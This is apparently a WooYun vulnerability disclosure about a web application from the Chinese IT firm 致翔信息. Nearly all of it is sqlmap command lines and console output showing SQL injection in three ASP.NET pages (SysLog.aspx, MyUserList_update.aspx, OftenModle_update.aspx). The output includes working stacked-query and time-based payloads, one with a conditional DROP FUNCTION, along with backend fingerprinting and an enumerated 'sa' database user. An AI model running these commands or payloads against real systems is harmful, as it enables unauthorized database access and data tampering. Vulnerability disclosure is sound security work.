WooYun.org

致翔信息由广州致翔计算机科技有限公司和深圳致翔云信息技术有限公司组成，在各地还有多家办事处，是以IT软件技术和管理不断创新为核心的客户需求导向型的信息技术公司。

SQL注入： #1************************ /MyWork/MySet/SysLog.aspx
POST注入 参数：SortText
http://**.**.**.**/MyWork/MySet/SysLog.aspx

C:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**/MyWork/MySet/SysLog.
aspx" --forms -p "SortText"
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150519}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 09:01:42
[09:01:42] [INFO] testing connection to the target URL
[09:01:42] [INFO] searching for forms
[#1] form:
POST http://**.**.**.**:80/MyWork/MySet/SysLog.aspx
POST data: __VIEWSTATE=%2FwEPDwULLTE4NzIyNDUyNTIPZBYCAgMPZBYEAgYPPCsADQBkAg0PEGR
kFgFmZBgBBQlHcmlkVmlldzEPZ2QNWzJWkwV%2BMygQbU2ieEAvljnOwA%3D%3D&Button3=%C8%AB%B
2%BF%C9%BE%B3%FD&Name=&Nowtimes=&GoPage=&DropDownList1=10&Username=&SortText=ord
er%20by%20id%20desc
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: __VIEWSTATE=%2FwEPDwULLTE4NzIyNDUyNTIPZBYCAgMPZBYEAgYPP
CsADQBkAg0PEGRkFgFmZBgBBQlHcmlkVmlldzEPZ2QNWzJWkwV%2BMygQbU2ieEAvljnOwA%3D%3D&Bu
tton3=%C8%AB%B2%BF%C9%BE%B3%FD&Name=&Nowtimes=&GoPage=&DropDownList1=10&Username
=&SortText=order%20by%20id%20desc] (Warning: blank fields detected):
do you want to fill blank fields with random values? [Y/n] Y
[09:01:57] [INFO] using 'C:\Users\Administrator\.sqlmap\output\results-07222015_
0901am.csv' as the CSV results file in multiple targets mode
[09:01:58] [INFO] heuristically checking if the target is protected by some kind
 of WAF/IPS/IDS
[09:01:58] [INFO] it appears that the target is not protected
[09:01:58] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[09:02:00] [WARNING] target URL is not stable. sqlmap will base the page compari
son on a sequence matcher. If no dynamic nor injectable parameters are detected,
 or in case of junk results, refer to user's manual paragraph 'Page comparison'
and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[09:02:03] [INFO] heuristic (basic) test shows that POST parameter 'SortText' mi
ght be injectable (possible DBMS: 'Microsoft SQL Server')
[09:02:04] [INFO] testing for SQL injection on POST parameter 'SortText'
heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL S
erver'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'Microsoft SQL Server' extending provided l
evel (1) and risk (1) values? [Y/n] Y
[09:02:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:02:17] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Par
ameter replace (original value)'
[09:02:17] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORD
ER BY clause'
[09:02:18] [WARNING] reflective value(s) found and filtering out
[09:02:19] [INFO] testing 'Microsoft SQL Server/Sybase stacked conditional-error
 blind queries'
[09:02:20] [INFO] POST parameter 'SortText' seems to be 'Microsoft SQL Server/Sy
base stacked conditional-error blind queries' injectable
[09:02:20] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[09:02:21] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause (IN)'
[09:02:21] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or
 HAVING clause'
[09:02:22] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or
 HAVING clause (IN)'
[09:02:22] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r
eplace'
[09:02:22] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r
eplace (integer column)'
[09:02:23] [INFO] testing 'Microsoft SQL Server/Sybase error-based - ORDER BY cl
ause'
[09:02:23] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[09:02:23] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[09:02:34] [INFO] POST parameter 'SortText' seems to be 'Microsoft SQL Server/Sy
base stacked queries' injectable
[09:02:34] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[09:02:45] [INFO] POST parameter 'SortText' seems to be 'Microsoft SQL Server/Sy
base time-based blind' injectable
[09:02:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:02:45] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[09:02:52] [INFO] checking if the injection point on POST parameter 'SortText' i
s a false positive
POST parameter 'SortText' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] N
sqlmap identified the following injection points with a total of 61 HTTP(s) requ
ests:
---
Parameter: SortText (POST)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
    Payload: __VIEWSTATE=/wEPDwULLTE4NzIyNDUyNTIPZBYCAgMPZBYSAgYPPCsADQEADxYGHgh
QYWdlU2l6ZQIKHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50ZmRkAgcPDxYCHgtDb21tYW5kTmFtZQU
BMWRkAggPDxYCHwMFATFkZAIJDw8WAh8DBQEyZGQCCg8PFgIfAwUBMGRkAg0PEGRkFgFmZAIODw8WAh4
EVGV4dAUBMGRkAg8PDxYCHwQFATFkZAIQDw8WAh8EBQEwZGQYAQUJR3JpZFZpZXcxDzwrAAoBCGZkZP5
Q2qX9c1Y2ZTrXOH4Xq9JGlDQ=&Button3=%C8%AB%B2%BF%C9%BE%B3%FD&Name=yZiw&Nowtimes=&G
oPage=PdFW&DropDownList1=10&Username=flOs&SortText=order by id desc; IF(7383=738
3) SELECT 7383 ELSE DROP FUNCTION OLse--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwULLTE4NzIyNDUyNTIPZBYCAgMPZBYSAgYPPCsADQEADxYGHgh
QYWdlU2l6ZQIKHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50ZmRkAgcPDxYCHgtDb21tYW5kTmFtZQU
BMWRkAggPDxYCHwMFATFkZAIJDw8WAh8DBQEyZGQCCg8PFgIfAwUBMGRkAg0PEGRkFgFmZAIODw8WAh4
EVGV4dAUBMGRkAg8PDxYCHwQFATFkZAIQDw8WAh8EBQEwZGQYAQUJR3JpZFZpZXcxDzwrAAoBCGZkZP5
Q2qX9c1Y2ZTrXOH4Xq9JGlDQ=&Button3=%C8%AB%B2%BF%C9%BE%B3%FD&Name=yZiw&Nowtimes=&G
oPage=PdFW&DropDownList1=10&Username=flOs&SortText=order by id desc; WAITFOR DEL
AY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwULLTE4NzIyNDUyNTIPZBYCAgMPZBYSAgYPPCsADQEADxYGHgh
QYWdlU2l6ZQIKHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50ZmRkAgcPDxYCHgtDb21tYW5kTmFtZQU
BMWRkAggPDxYCHwMFATFkZAIJDw8WAh8DBQEyZGQCCg8PFgIfAwUBMGRkAg0PEGRkFgFmZAIODw8WAh4
EVGV4dAUBMGRkAg8PDxYCHwQFATFkZAIQDw8WAh8EBQEwZGQYAQUJR3JpZFZpZXcxDzwrAAoBCGZkZP5
Q2qX9c1Y2ZTrXOH4Xq9JGlDQ=&Button3=%C8%AB%B2%BF%C9%BE%B3%FD&Name=yZiw&Nowtimes=&G
oPage=PdFW&DropDownList1=10&Username=flOs&SortText=order by id desc WAITFOR DELA
Y '0:0:5'--
---
do you want to exploit this SQL injection? [Y/n] Y
[09:02:58] [INFO] testing Microsoft SQL Server
[09:02:58] [INFO] confirming Microsoft SQL Server
[09:03:00] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[09:03:00] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 51 times
[09:03:00] [INFO] you can find results of scanning in multiple targets mode insi
de the CSV file 'C:\Users\Administrator\.sqlmap\output\results-07222015_0901am.c
sv'

database management system users [2]: [*] a0524175644 [*] sa

#2***************************** /MyWork/MySet/MyUserList_update.aspx?id=x
x为任意值 POST注入 参数： GlRealname (POST)
http://**.**.**.**/MyWork/MySet/MyUserList_update.aspx?id=6
C:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**/MyWork/MySet/MyUserL
ist_update.aspx?id=6 " --forms -p "GlRealname"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150519}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 09:12:20
[09:12:20] [INFO] testing connection to the target URL
[09:12:21] [INFO] searching for forms
[#1] form:
POST http://**.**.**.**:80/MyWork/MySet/MyUserList_update.aspx?id=6
POST data: __VIEWSTATE=%2FwEPDwUKMTc3ODY4MDcwMGRkG%2FLMZgLdvDI%2FG0B54lFmXEcebA4
%3D&Name=&GlRealname=&Paixun=0&Button1=%CC%E1%20%BD%BB&GlUsername=
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: __VIEWSTATE=%2FwEPDwUKMTc3ODY4MDcwMGRkG%2FLMZgLdvDI%2FG
0B54lFmXEcebA4%3D&Name=&GlRealname=&Paixun=0&Button1=%CC%E1%20%BD%BB&GlUsername=
] (Warning: blank fields detected):
do you want to fill blank fields with random values? [Y/n] Y
[09:12:26] [INFO] using 'C:\Users\Administrator\.sqlmap\output\results-07222015_
0912am.csv' as the CSV results file in multiple targets mode
[09:12:26] [INFO] heuristically checking if the target is protected by some kind
of WAF/IPS/IDS
[09:12:26] [INFO] it appears that the target is not protected
[09:12:26] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[09:12:28] [INFO] target URL is stable
[09:12:28] [WARNING] heuristic (basic) test shows that POST parameter 'GlRealnam
e' might not be injectable
[09:12:28] [INFO] testing for SQL injection on POST parameter 'GlRealname'
[09:12:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:12:29] [WARNING] reflective value(s) found and filtering out
[09:12:38] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[09:12:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[09:12:43] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[09:12:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[09:12:52] [INFO] testing 'MySQL inline queries'
[09:12:52] [INFO] testing 'PostgreSQL inline queries'
[09:12:53] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[09:12:53] [INFO] testing 'Oracle inline queries'
[09:12:53] [INFO] testing 'SQLite inline queries'
[09:12:54] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[09:12:54] [CRITICAL] considerable lagging has been detected in connection respo
nse(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or
more)
[09:12:56] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[09:13:00] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[09:13:17] [INFO] POST parameter 'GlRealname' seems to be 'Microsoft SQL Server/
Sybase stacked queries' injectable
[09:13:17] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[09:13:28] [INFO] POST parameter 'GlRealname' seems to be 'Microsoft SQL Server/
Sybase time-based blind' injectable
[09:13:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:13:28] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[09:13:38] [INFO] checking if the injection point on POST parameter 'GlRealname'
is a false positive
POST parameter 'GlRealname' is vulnerable. Do you want to keep testing the other
s (if any)? [y/N] N
sqlmap identified the following injection points with a total of 94 HTTP(s) requ
ests:
---
Parameter: GlRealname (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKMTc3ODY4MDcwMGRkG/LMZgLdvDI/G0B54lFmXEcebA4=&Na
me=xNQs&GlRealname='; WAITFOR DELAY '0:0:5'--&Paixun=0&Button1=%CC%E1 %BD%BB&GlU
sername=ATWc
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKMTc3ODY4MDcwMGRkG/LMZgLdvDI/G0B54lFmXEcebA4=&Na
me=xNQs&GlRealname=' WAITFOR DELAY '0:0:5'--&Paixun=0&Button1=%CC%E1 %BD%BB&GlUs
ername=ATWc
---
do you want to exploit this SQL injection? [Y/n] Y
[09:14:05] [INFO] testing Microsoft SQL Server
[09:14:05] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
[09:14:10] [INFO] confirming Microsoft SQL Server
[09:14:22] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[09:14:22] [INFO] you can find results of scanning in multiple targets mode insi
de the CSV file 'C:\Users\Administrator\.sqlmap\output\results-07222015_0912am.c
sv'
[*] shutting down at 09:14:22
#3**************************************** /MyWork/MySet/OftenModle_update.aspx?id=x
x为任意值 参数： Name (POST)
http://**.**.**.**:80/MyWork/MySet/OftenModle_update.aspx?id=55
C:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**/MyWork/MySet/OftenMo
dle_update.aspx?id=55" --forms -p "Name"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150519}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 09:16:58
[09:16:58] [INFO] testing connection to the target URL
[09:16:58] [INFO] searching for forms
[#1] form:
POST http://**.**.**.**:80/MyWork/MySet/OftenModle_update.aspx?id=55
POST data: __VIEWSTATE=%2FwEPDwUJNjU2NDE3MDUyZGSvuETczwNAiBkg0FPbaoiEFygd2g%3D%3
D&Name=&Sharing=%B7%F1&SharingRealname=&Button1=%C8%B7%20%B6%A8&SharingUsername=
&ContractContent=&ContractContentupdate=
do you want to test this form? [Y/n/q]
> y
Edit POST data [default: __VIEWSTATE=%2FwEPDwUJNjU2NDE3MDUyZGSvuETczwNAiBkg0FPba
oiEFygd2g%3D%3D&Name=&Sharing=%B7%F1&SharingRealname=&Button1=%C8%B7%20%B6%A8&Sh
aringUsername=&ContractContent=&ContractContentupdate=] (Warning: blank fields d
etected):
do you want to fill blank fields with random values? [Y/n] y
[09:17:02] [INFO] using 'C:\Users\Administrator\.sqlmap\output\results-07222015_
0917am.csv' as the CSV results file in multiple targets mode
[09:17:02] [INFO] heuristically checking if the target is protected by some kind
of WAF/IPS/IDS
[09:17:03] [INFO] it appears that the target is not protected
[09:17:03] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[09:17:04] [INFO] target URL is stable
[09:17:05] [WARNING] heuristic (basic) test shows that POST parameter 'Name' mig
ht not be injectable
[09:17:05] [INFO] testing for SQL injection on POST parameter 'Name'
[09:17:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:17:05] [WARNING] reflective value(s) found and filtering out
[09:17:12] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[09:17:14] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[09:17:18] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[09:17:21] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[09:17:23] [INFO] testing 'MySQL inline queries'
[09:17:23] [INFO] testing 'PostgreSQL inline queries'
[09:17:24] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[09:17:24] [INFO] testing 'Oracle inline queries'
[09:17:25] [INFO] testing 'SQLite inline queries'
[09:17:25] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[09:17:27] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[09:17:29] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[09:17:41] [INFO] POST parameter 'Name' seems to be 'Microsoft SQL Server/Sybase
stacked queries' injectable
[09:17:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[09:17:52] [INFO] POST parameter 'Name' seems to be 'Microsoft SQL Server/Sybase
time-based blind' injectable
[09:17:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:17:52] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[09:18:00] [INFO] checking if the injection point on POST parameter 'Name' is a
false positive
POST parameter 'Name' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] n
sqlmap identified the following injection points with a total of 94 HTTP(s) requ
ests:
---
Parameter: Name (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUJNjU2NDE3MDUyZGSvuETczwNAiBkg0FPbaoiEFygd2g==&Na
me=stYH'; WAITFOR DELAY '0:0:5'--&Sharing=%B7%F1&SharingRealname=bVVB&Button1=%C
8%B7 %B6%A8&SharingUsername=QDwZ&ContractContent=&ContractContentupdate=JoMi
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUJNjU2NDE3MDUyZGSvuETczwNAiBkg0FPbaoiEFygd2g==&Na
me=stYH' WAITFOR DELAY '0:0:5'--&Sharing=%B7%F1&SharingRealname=bVVB&Button1=%C8
%B7 %B6%A8&SharingUsername=QDwZ&ContractContent=&ContractContentupdate=JoMi
---
do you want to exploit this SQL injection? [Y/n] y
[09:18:21] [INFO] testing Microsoft SQL Server
[09:18:21] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
[09:18:29] [INFO] confirming Microsoft SQL Server
[09:18:40] [INFO] adjusting time delay to 3 seconds due to good response times
[09:18:41] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[09:18:41] [INFO] you can find results of scanning in multiple targets mode insi
de the CSV file 'C:\Users\Administrator\.sqlmap\output\results-07222015_0917am.c
sv'
[*] shutting down at 09:18:41